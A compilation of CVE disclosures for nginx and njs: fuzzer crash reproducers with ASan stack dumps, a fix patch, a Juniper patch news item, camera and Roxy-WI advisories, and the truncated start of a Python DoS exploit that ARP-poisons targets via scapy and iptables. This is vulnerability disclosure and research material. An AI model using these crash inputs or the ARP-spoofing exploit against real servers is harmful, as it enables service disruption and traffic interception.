Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_value_to_number at src/njs_value_conversion.h.

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 74595E5A-F4AD-43DB-A4E9-34F2D366AD8A
    function placeholder(){}
    function main() {
    var v0 = /gL8?/;
    var v1 = {};
    var v2 = [v1,v1,v0];
    function v4(v5) {
        v2[1866532165] = undefined;
    }
    function v6(v7,v8) {
        function v10(v11) {
            v11[-4294967297] = Map;
        }
        var v13 = new Uint16Array(v2);
    }
    v1.valueOf = v4;
    var v15 = typeof Map;
    var v17 = typeof Map;
    var v19 = new Promise(v6);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==7855==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x00000063545b bp 0x7ffeac888710 sp 0x7ffeac8884e0 T0)
    ==7855==The signal is caused by a READ memory access.
    ==7855==Hint: address points to the zero page.
        #0 0x63545b in njs_value_to_number /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9
        #1 0x63545b in njs_typed_array_alloc /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:171:19
        #2 0x63a56b in njs_typed_array_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:229:13
        #3 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #4 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #5 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #6 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #7 0x573b65 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #8 0x573b65 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
        #9 0x648ed3 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
        #10 0x648ed3 in njs_promise_constructor_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:214:11
        #11 0x648ed3 in njs_promise_constructor /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_promise.c:164:15
        #12 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #13 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #14 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #15 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #16 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #17 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #22 0x7f8daaa33082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value_conversion.h:17:9 in njs_value_to_number
    ==7855==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34031: SEGV src/njs_value_conversion.h:17:9 in njs_value_to_number · Issue #523 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_djb_hash at src/njs_djb_hash.c.

Environment

Commit  : c756e23eb09dac519fe161c88587cc034306630f (high:1882)
Version : 0.7.5
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

    // Minimizing 8AC3654E-F5A1-405C-B380-951904AD058C
    function placeholder(){}
    function main() {
    var v1 = Function;
    var v6 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185];
    var v8 = [v6,1050462187];
    var v11 = [930866.8987935185,930866.8987935185,930866.8987935185,930866.8987935185];
    var v13 = [v11,1050462187];
    var v15 = v11.__proto__;
    function v16(v17,v18,v19,...v20) {
        var v21 = [v17,-1000000000000.0];
        function v22(v23,v24,v25,...v26) {
            var v27 = {"d":v22};
            var v28 = Object.defineProperty(v15,v18,v27);
        }
        var v30 = v21["find"](v22);
    }
    var v32 = v13["find"](v16);
    var v34 = v6.__proto__;
    function v35(v36,v37,v38,...v39) {
        'use strict';
        var v40 = [v36,-1000000000000.0];
        var v42 = 471270.459031428 in v39;
        var v43 = 1000.0;
        var v45 = String.fromCodePoint();
        var v46 = -128;
        var v50 = `YVySS90U8G${v45}string${-452883207}-2${Uint8Array}dotAll`.indexOf();
        var v51 = 50691;
        var v52 = 658545.3967616097;
        var v53 = undefined;
        var v54 = -1.7976931348623157e+308;
        var v55 = 2147483647;
        var v56 = 4184750072;
        var v57 = "toString";
        var v58 = Float64Array;
        var v59 = "a";
        var v60 = 54444;
        var v61 = ["c14RHVOudV",1050462187];
        function v62(v63,v64,v65,...v66) {
            var v68 = v34["shift"]();
        }
        var v70 = v61["find"](v62);
        function v71(v72,v73,v74,...v75) {
            'use strict';
            var v76 = {"get":v71};
            var v77 = Object.defineProperty(v34,35017,v76);
        }
        var v79 = v40["find"](v71);
    }
    var v81 = v8["find"](v35);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==2802==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004e312b bp 0x7ffca2668c70 sp 0x7ffca2668c40 T0)
    ==2802==The signal is caused by a READ memory access.
    ==2802==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4e312b in njs_djb_hash /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16
        #1 0x4f10cb in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:618:32
        #2 0x502d6a in njs_vmcode_property_in /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:1431:11
        #3 0x502d6a in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:492:23
        #4 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #5 0x573a55 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16
        #6 0x573a55 in njs_function_call2 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:592:11
        #7 0x560b05 in njs_function_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.h:178:12
        #8 0x560b05 in njs_array_iterator_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:1918:12
        #9 0x560b05 in njs_array_handler_find /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2025:11
        #10 0x65b9ea in njs_object_iterate /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_iterator.c
        #11 0x554e0f in njs_array_prototype_iterator /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_array.c:2297:11
        #12 0x57599e in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:739:11
        #13 0x573d0c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:777:16
        #14 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #15 0x574b62 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #16 0x573d3f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:780:16
        #17 0x500f5f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #18 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #19 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #20 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #21 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #22 0x7f1db1e4a082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #23 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_djb_hash.c:21:16 in njs_djb_hash
    ==2802==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34030: SEGV src/njs_djb_hash.c:21:16 in njs_djb_hash · Issue #540 · nginx/njs

Nginx NJS v0.7.4 was discovered to contain an out-of-bounds read via njs_scope_value at njs_scope.h.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

May 30, 2022

· 2 comments

Assignees

**Comments**

Environment

Commit  : 9f4ebc96148308a8ce12f2b54432c87e6d78b881
Version : 0.7.4
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

// Minimizing 34F6ED23-C193-452B-B724-E62BD7E15360
function placeholder(){}
function main() {
function v0(v1,v2,v3,v4,...v5) {
    try {
        async function v7(v8,v9,v10,v11) {
            var v12 \= await Proxy;
        }
        var v13 \= v0();
    } catch(v14) {
    } finally {
    }
    var v15 \= {};
    var v16 \= /gL8?/;
    var v17 \= {};
    var v18 \= \[v15,v17,v16\];
    function v20(v21) {
        v18\[1866532165\] \= Map;
    }
    async function v24(v25,v26) {
        var v27 \= await Map;
    }
    function v28(v29,v30) {
    }
    var v32 \= new Promise(v28);
    var v34 \= v32\["catch"\]();
    var v37 \= {"get":Promise,"set":v24};
    var v38 \= Object.defineProperty(v34,"constructor",v37);
    async function v39(v40,v41) {
        var v42 \= await v38;
    }
    var v43 \= v39();
    var v44 \= v20(Map);
}
var v45 \= v0();
}
main();

Minified

function run\_then() {}

function f(n) {
    if (n \== 2) {
        return;
    }

    try {
        f(n + 1);
    } catch(e) {
    }

    var p \= new Promise(run\_then);
    Object.defineProperty(p, "constructor", {get: () \=> ({}).a.a});
    async function g() {
        await p;
    }

    g();

    throw 'QQ';
}

f(0);

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==815==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000040 (pc 0x0000004ff20b bp 0x7ffc7abf6030 sp 0x7ffc7abf5880 T0)
    ==815==The signal is caused by a READ memory access.
    ==815==Hint: address points to the zero page.
        #0 0x4ff20b in njs_scope_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12
        #1 0x4ff20b in njs_scope_valid_value /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:84:13
        #2 0x4ff20b in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:155:13
        #3 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #4 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #5 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #6 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #7 0x7f8dc7694082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #8 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_scope.h:74:12 in njs_scope_value
    ==815==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

 dramthy changed the title SEGV njs\_scope.h:74:12 Heap-based Buffer Overflow in njs\_scope\_value SEGV njs\_scope.h:74:12 Out-of-bounds Read in njs\_scope\_value

May 30, 2022

Copy link

Contributor

** **xeioex** commented Jun 2, 2022**

The patch

# HG changeset patch
# Parent  d63163569c25cb90fe654f0fedefde43553f833a
Fixed njs\_vmcode\_interpreter() when await fails.

Previously, while interpreting a user function, njs\_vmcode\_interpreter()
might return prematurely when an error happens in await instruction.
This is not correct because the current frame has to be unwound (or
exception caught) first.

The fix is exit through only 5 appropriate exit points to ensure
proper unwinding.

The patch correctly fixes issue reported in 07ef6c1f04f1 (0.7.3).

This closes #506 issue on Github.

diff --git a/src/njs\_vmcode.c b/src/njs\_vmcode.c
\--- a/src/njs\_vmcode.c
+++ b/src/njs\_vmcode.c
@@ -858,7 +858,12 @@ next:
 
                 njs\_vmcode\_debug(vm, pc, "EXIT AWAIT");
 
\-                return njs\_vmcode\_await(vm, await, promise\_cap, async\_ctx);
+                ret = njs\_vmcode\_await(vm, await, promise\_cap, async\_ctx);
+                if (njs\_slow\_path(ret == NJS\_ERROR)) {
+                    goto error;
+                }
+
+                return ret;
 
             case NJS\_VMCODE\_TRY\_START:
                 ret = njs\_vmcode\_try\_start(vm, value1, value2, pc);
@@ -1923,6 +1928,7 @@ njs\_vmcode\_await(njs\_vm\_t \*vm, njs\_vmcod
 
     value = njs\_scope\_valid\_value(vm, await->retval);
     if (njs\_slow\_path(value == NULL)) {
+        njs\_internal\_error(vm, "await->retval is invalid");
         return NJS\_ERROR;
     }
 

Yes, I check the patch is valid for #506,#508,#509,#510,#511,#512,#513,#514,#515,#516,#518,#519,#520,#521,#525,#526,#527,#528. @xeioex

2 participants

CVE-2022-34029: SEGV njs_scope.h:74:12 Out-of-bounds Read in njs_scope_value · Issue #506 · nginx/njs

Nginx NJS v0.7.5 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h.

Environment

    Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
    Version : 0.7.5
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Proof of concept

    // Minimizing 811225C4-281E-48F6-8D83-E65B5DB8E211
    function placeholder(){}
    function main() {
    var v0 = "WbgAtnLEGv";
    var v2 = [10000,10000,10000,10000,10000];
    var v3 = 0.0;
    var v4 = undefined;
    var v6 = v2.includes();
    var v7 = 1;
    var v10 = NaN;
    var v11 = 3269;
    var v12 = "toUpperCase";
    var v14 = String["fromCharCode"](String,1156435285,String,3269);
    var v17 = `symbol${String}undefined${v14}number${v14}byteOffset${1156435285}e`["replace"](1156435285,v14);
    var v19 = Uint8ClampedArray.from(v17);
    }
    main();
    // CRASH INFO
    // ==========
    // TERMSIG: 11
    // STDERR:
    
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==9418==ERROR: AddressSanitizer: SEGV on unknown address 0x62505a68846a (pc 0x000000516e19 bp 0x7ffc9f96e8f0 sp 0x7ffc9f96e890 T0)
    ==9418==The signal is caused by a READ memory access.
        #0 0x516e19 in njs_utf8_next /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9
        #1 0x516e19 in njs_string_offset /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:2539:17
        #2 0x516e19 in njs_string_slice_string_prop /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1512:21
        #3 0x5176bf in njs_string_slice /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_string.c:1544:5
        #4 0x4f35dd in njs_string_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:910:16
        #5 0x4f189b in njs_object_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:693:27
        #6 0x4f189b in njs_property_query /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:622:15
        #7 0x4ef9fe in njs_value_property /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.c:1058:11
        #8 0x63b787 in njs_value_property_i64 /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_value.h:1087:12
        #9 0x63b787 in njs_typed_array_from /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_typed_array.c:407:15
        #10 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
        #11 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
        #12 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #13 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
        #14 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
        #15 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
        #16 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
        #17 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
        #18 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
        #19 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
        #20 0x7f83cfee1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #21 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_utf8.h:52:9 in njs_utf8_next
    ==9418==ABORTING
    
    

Credit  
dramthy(@topsec alpha)

CVE-2022-34028: SEGV src/njs_utf8.h:52:9 in njs_utf8_next · Issue #522 · nginx/njs

Nginx NJS v0.7.4 was discovered to contain a segmentation violation via njs_value_property at njs_value.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

dramthy opened this issue

May 19, 2022

· 0 comments

**Comments**

Environment

Commit  : 6cef7f5055ec24275f0ae121c7f8709ff3e0c454
Version : 0.7.4
Build   : 
     ./configure \--cc\=clang \--address\-sanitizer\=YES     
     make

Proof of concept

    // minified
    function f() {}                                                                                                                         
    Object.defineProperty(f, 'length', {set: () => {}});                                                                                    
    Object.defineProperty(f, 'length', Object.getOwnPropertyDescriptor([], 'length'));                                                      
    f.length  
    

Stack dump

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==25984==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000004ea634 bp 0x7ffdd4213270 sp 0x7ffdd42130c0 T0)
    ==25984==The signal is caused by a READ memory access.
    ==25984==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
        #0 0x4ea634 in njs_value_property /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_value.c:1083:19
        #1 0x521273 in njs_object_length /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_object.c:2628:11
        #2 0x600a64 in njs_promise_race /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_promise.c:1727:11
        #3 0x54c08e in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:728:11
        #4 0x54a9a7 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:766:16
        #5 0x4f9b4f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vmcode.c:799:23
        #6 0x54b526 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:693:11
        #7 0x54a9b9 in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_function.c:769:16
        #8 0x4f9b4f in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vmcode.c:799:23
        #9 0x4f25ba in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_vm.c:541:11
        #10 0x4de3fd in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:890:19
        #11 0x4dd98f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:619:11
        #12 0x4dd98f in main /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_shell.c:303:15
        #13 0x7f7bafed2082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
        #14 0x41ea5d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-asan/build/njs+0x41ea5d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs-asan/src/njs_value.c:1083:19 in njs_value_property
    ==25984==ABORTING
    
    
    

Credit  
dramthy(@topsec alpha)

 dramthy changed the title SEGV njs\_value.c:1083:19 in njs\_value\_property SEGV njs\_value.c:1083:19 in njs\_value\_property #bug #fuzzer

May 19, 2022

 dramthy changed the title SEGV njs\_value.c:1083:19 in njs\_value\_property #bug #fuzzer SEGV njs\_value.c:1083:19 in njs\_value\_property

May 19, 2022

2 participants

CVE-2022-34027: SEGV njs_value.c:1083:19 in njs_value_property · Issue #504 · nginx/njs

Juniper Networks has pushed security updates to address several vulnerabilities affecting multiple products, some of which could be exploited to seize control of affected systems.
The most critical of the flaws affect Junos Space and Contrail Networking, with the tech company urging customers to release versions 22.1R1 and 21.4.0, respectively.
Chief among them is a collection of 31 bugs in the

Juniper Networks has pushed security updates to address several vulnerabilities affecting multiple products, some of which could be exploited to seize control of affected systems.

The most critical of the flaws affect Junos Space and Contrail Networking, with the tech company urging customers to release versions 22.1R1 and 21.4.0, respectively.

Chief among them is a collection of 31 bugs in the Junos Space network management software, including CVE-2021-23017 (CVSS score: 9.4) that could result in a crash of vulnerable devices or even achieve arbitrary code execution.

"A security issue in nginx resolver was identified, which might allow an attacker who is able to forge UDP packets from the DNS server to cause 1-byte memory overwrite, resulting in worker process crash or potential other impact," the company said.

The same security vulnerability has also been remediated in Northstar Controller in versions 5.1.0 Service Pack 6 and 6.2.2.

Additionally, the networking equipment maker cautioned of multiple known issues exist in CentOS 6.8 that's shipped with Junos Space Policy Enforcer before version 22.1R1. As mitigations, the version of CentOS packed with the Policy Enforcer component has been upgraded to 7.9.

Also listed are 166 security vulnerabilities impacting its Contrail Networking product that impact all versions prior to 21.4.0 and have been collectively given the maximum CVSS score of 10.0.

"Multiple vulnerabilities in third party software used in Juniper Networks Contrail Networking have been resolved in release 21.4.0 by upgrading the Open Container Initiative (OCI)-compliant Red Hat Universal Base Image (UBI) container image from Red Hat Enterprise Linux 7 to Red Hat Enterprise Linux 8," it noted in an advisory.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Juniper Releases Patches for Critical Flaws in Junos OS and Contrail Networking

The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. In this way an attacker can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.

Permalink

Cannot retrieve contributors at this time

RCE Security Advisory

https://www.rcesecurity.com

1\. ADVISORY INFORMATION

\=======================

Product: Reolink E1 Zoom Camera

Vendor URL: https://reolink.com/product/e1-zoom/

Type: Exposure of Sensitive Information to an Unauthorized Actor \[CWE-200\]

Date found: 2021-08-26

Date published: 2022-06-01

CVSSv3 Score: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

CVE: CVE-2021-40150

2\. CREDITS

\==========

This vulnerability was discovered and researched by Julien Ahrens from

RCE Security.

3\. VERSIONS AFFECTED

\====================

Reolink E1 Zoom Camera 3.0.0.716 (latest) and below

4\. INTRODUCTION

\===============

Meet new generation of Reolink E1 series. Advanced features - 5MP Super HD

& optical zoom are added into this compact camera. Plus two-way audio, remote

live view and more smart capacities help you connect with what you care. Be

closer to families and be away from worries.

(from the vendor's homepage)

5\. VULNERABILITY DETAILS

\========================

The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration

via the /conf/ directory that is mapped to a publicly accessible path.

An unauthenticated attacker can abuse this with network-level access to

the camera to download the entire NGINX/FastCGI configurations by querying, i.e.:

http://\[CAM-IP\]/conf/nginx.conf

http://\[CAM-IP\]/conf/fastcgi.conf

Etc.

6\. RISK

\=======

An unauthenticated attacker can download the webserver's configuration

files which might lead to sensitive information disclosure.

7\. SOLUTION

\===========

None.

8\. REPORT TIMELINE

\==================

2021-08-26: Discovery of the vulnerability

2021-08-26: Sent notification to Reolink via their support channel

2021-08-26: Response from vendor asking for vulnerability details

2021-08-26: Sent all the vulnerability details

2021-08-31: Vendor is still looking into the issue

2021-09-03: Vendor states that the issue will be fixed with the next firmware update by the end of September.

2021-10-01: Since no firmware has been released, we've sent another notification

2021-10-02: Vendor states that the new firmware is delayed

2022-02-01: Since there is still fix, sent another notification

2022-02-02: Vendor states that the firmware with the fix hasn't been released yet.

2022-03-03: Since there is still fix, sent another notification

2022-03-12: Vendor states they're still working on the issue (internal update awaits testing)

2022-05-24: Since there is still fix, sent another notification

2022-05-24: Vendor states that the update still hasn't been released yet.

2022-06-01: Almost a year should be enough to fix this. Public disclosure.

9\. REFERENCES

\=============

https://github.com/MrTuxracer/advisories

CVE-2021-40150: advisories/CVE-2021-40150.txt at master · MrTuxracer/advisories

Roxy-WI is a Web interface for managing HAProxy, Nginx and Keepalived servers. Prior to version 6.1.1.0, the system command can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Version 6.1.1.0 contains a patch for this issue.

**Unauthenticated Remote Code Execution via ssl\_cert Upload**

Critical

Aidaho12 published GHSA-pg3w-8p63-x483

Jul 6, 2022

**Package**

options.py (Roxy-WI)

**Affected versions**

< 6.1.1.0

**Description**

**Impact**

A vulnerability in Roxy-wi allows a remote, unauthenticated attacker to code execution by sending a specially crafted HTTP request to /app/options.py file via **upload** function. This affects Roxy-wi versions before 6.1.0.

**Patches**

in 6.1.1.0 version

**Severity**

**CVSS base metrics**

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L

**Weaknesses**

CVE-2022-31161

Nginx version 1.20.0 suffers from a denial of service vulnerability.

    # Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)# Date: 2022-6-29# Exploit Author: Mohammed Alshehri - https://Github.com/M507# Vendor Homepage: https://nginx.org/# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0# Version: 0.6.18 - 1.20.0# Tested on: Ubuntu 18.04.4 LTS bionic # CVE: CVE-2021-23017# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1# The service needs to be configured to use Nginx resolverfrom scapy.all import *from multiprocessing import Processfrom binascii import hexlify, unhexlifyimport argparse, time, osdef device_setup():    os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")    os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")def ARPP(target, dns_server):    print("[*] Sending poisoned ARP packets")    target_mac = getmacbyip(target)    dns_server_mac = getmacbyip(dns_server)    while True:        time.sleep(2)        send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)        send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)def exploit(target):    print("[*] Listening ")    sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)"""RFC schema 0                   1                   2                   3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 